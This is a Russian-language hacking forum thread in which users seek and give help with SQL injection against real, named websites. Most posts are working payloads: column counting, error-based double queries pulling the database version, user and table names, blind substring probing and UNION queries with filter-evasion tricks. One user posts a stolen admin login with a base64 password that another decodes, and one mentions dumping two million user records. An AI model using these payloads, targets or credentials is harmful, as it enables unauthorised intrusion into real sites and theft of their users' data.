Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    не как не моqу наyтьи column..
    помоqите..
     
  2. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+order+by+17--
     
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a qde zdes printabelniy column ??
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+version()),floor(rand(0)*2))+From+menus+Group+By+2)a)
    
     
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    http://www.soulmades.com.au/index.php?ap=2956775%20AND%20ascii%28substring%28%28database%28%29%29,15,1%29%29=115
    database - mades_soulmades
    +там 4'тая ветка
     
    #12405 Дирижабль, 18 Apr 2010
    Last edited: 18 Apr 2010
  6. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Translate!!!!!

    Всем приятного времени сутак )
    Сразу к делу ..

    Черес уязвимост получил логин и парол админа но когда пробую заити как админ говарит што парол/логин непатходит...

    Вот сам сайт :ww_w.zhengazeta.by/magia_gadania/category/89

    Login: admin
    Pw : eXoyMDA4

    Настораживает присутствие в сочетание пароля (MDA)... возможна ветом проблема ?

    Вопчем уже не первый раз такое , посоветуйте как распознавать разные типы паролей если они зашифрованы ... или что именно не пускает зайти

    Силна не пинайте .. спс
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Пароль в BASE64, "yz2008"
     
    1 person likes this.
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как здесь можно обойти фильтрацию?

    http://www.vino-concept.ch/content.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10+frfromom+information_schema.tables+--+
     
  9. Hk4q5

    Hk4q5 New Member

    Joined:
    12 Nov 2009
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    http://***/view.php?abc=1version()&def=ghi

    FUNCTION ttt.1version does not exist

    view.php?abc=1version0&def=ghi

    Unknown column '1version0' in 'where clause'

    что делать?)
    единицу нельзя убрать в переди)
     
  10. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Translate !!!!!

    Спс Pashkela , Вопчем пропустить через все кодировки ?
     
  11. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    1/**/version0&def=ghi так идет?
     
  12. Hk4q5

    Hk4q5 New Member

    Joined:
    12 Nov 2009
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    нет так тоже пробовал.

    делаю запрос

    Code:
     http://xxx/xxx.php?abc=1%version()&def=ghi
    получаю в исходном коде :
    Code:
    <input type="hidden" name="id" value="1%version()">
    Code:
    1/**/OR/*d*/user=root
    
    Unknown column 'user' in 'where clause'

    Code:
    1/**/OR/*d*/author=id
    
    <input type="hidden" name="id" value="1/**/OR/*d*/author=id"> 

    не пойму :)



    P.S урл дать не могу сайт почти копия milw0rm.com
    :p


    всем спасибо сам разобрался:
    +and(select%201%20from(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--&
     
    #12412 Hk4q5, 18 Apr 2010
    Last edited: 18 Apr 2010
  13. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а дальше как ??

    http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+/*!table_name*/),floor(rand(0)*2))+From+/*!information_schema.tables*/+Group+By+2)a)

    не получается..


    http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+Table_name),floor(rand(0)*2))+From+Information_Schema.Tables+Group+By+2)a)

    и так не получается..

    http://medtechservice.am/index.php?mod=pages&act=show&menu_id=159+and+(Select+1+From+(Select+count(0),concat((Select+tAbLe_NamE),floor(rand(0)*2))+From+iNfOrMation_SchemA.tAblEs+Group+By+2)a)

    и так..
     
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    [-_-]
     
  15. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    Feldmarschall, что 4 ветка я знаю, даже знаю имя таблицы где лежат данные юзеров.

    тянуть 2 ляма юзеров слепым это жесть
     
  16. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    помогите подобрать sql запрос сдесь
    http://warsong.ws/exchange/?s=send
     
  17. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а ето как ??
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    так ты уже задавал этот вопрос.. и тебе вроде бы ответили
     
  19. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    да, но скрипт изменили уже а ошибка осталась...
     
  20. slayzer

    slayzer New Member

    Joined:
    30 Apr 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    "UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.tables #"' at line 1
    -----------------------------------------------------------------
    А если "UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA.tables #

    то

    The used SELECT statements have a different number of columns
    :(
     
Thread Status:
Not open for further replies.